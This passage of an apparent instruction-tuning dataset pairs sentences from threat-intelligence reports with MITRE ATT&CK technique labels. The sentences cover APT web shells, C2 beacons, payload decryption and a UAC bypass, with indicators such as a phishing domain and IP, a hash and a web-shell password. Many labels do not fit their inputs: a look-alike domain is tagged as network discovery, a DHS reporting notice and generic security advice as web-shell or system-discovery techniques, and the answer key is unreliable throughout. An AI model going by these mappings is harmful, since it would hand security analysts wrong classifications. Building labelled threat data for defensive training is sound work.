from= ai= ags= oe= aq= btnG= oprnd= ai= utm= channel= The page address in the domain of the command and control server is chosen randomly from the list", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a \u201ccampaign identifier.\u201d Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attack Lifecycle Initial Compromise APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI\u2019s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"(Source: Dell SecureWorks) Passwords, like \"\"admin-na-google123!@#\"\" shown in Figure 4, are required to interact with the web shell\"", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TG-3390 has used additional web shells containing similarly formatted passwords", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ASPXTool \u2014 A modified version of the ASPXSpy web shell (see Figure 6)", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers, disguising it as an ISAPI filter", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f \u2013 47) 0x4d Field 1 \u2013 Windows major version (0x6 \u2013 Windows Vista+) 0x51 Field 2 \u2013 Windows minor version (0x1 \u2013 Windows 7) 0x55 Field 3 \u2013 Unknown (0x20) 0x59 Payload (default flag:4/2/2018 1:01:33 AM) Table 5 \u2013 Beacon structure for PLAINTEE", + "output": "- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform: IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Appendix Malware Family Descriptions Malware Family Description Availability DROPSHOT Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware Non-Public NANOCORE Publicly available remote access Trojan (RAT) available for purchase", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: cc The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver continues to collect various information from the victim machine, including the following: Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Here is an example of the result of ps\u00a0ax on an infected system: $ ps ax[...] 566 ?? Ss 0:00.01 /usr/libexec/icloudsyncd -launchd netlogon.bundle[...] Figure 8: Result of ps ax on an infected system Keychain stealing The OSX/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X\u2019s keychain", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A multilayered approach is a must to securing the organization\u2019s perimeter, especially for information security professionals and system/IT administrators", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The verb get can be used in a myriad of ways to retrieve information for a machine, however in this case os get /format: is being abused to download payloads from non-local resources with .xsl extensions", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS", + "output": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the backdoor establishes a connection to the command and control server, it sets the request period time equal to the specified dwell time for the standby mode", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn\u2019t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once decrypted, we are provided with a large list of strings, as seen below (note that the data has been truncated for brevity): Figure 12 Decrypted strings from embedded BMP file After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Its purpose is to load Msadoz.dll in order to decrypt and execute it in memory", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2 \u2013 The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ESET\u2019s analysis of a recent backdoor used by TeleBots \u2013 the group behind the massive NotPetya ransomware outbreak \u2013 uncovers strong code similarities to the Industroyer main backdoor, revealing a rumored connection that was not previously proven The post New TeleBots backdoor: First evidence linking Industroyer to NotPetya appeared first on WeLiveSecurity", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This exception invokes the exception handler containing the HTTP communication code, allowing it to run", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1 \u2013 The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant 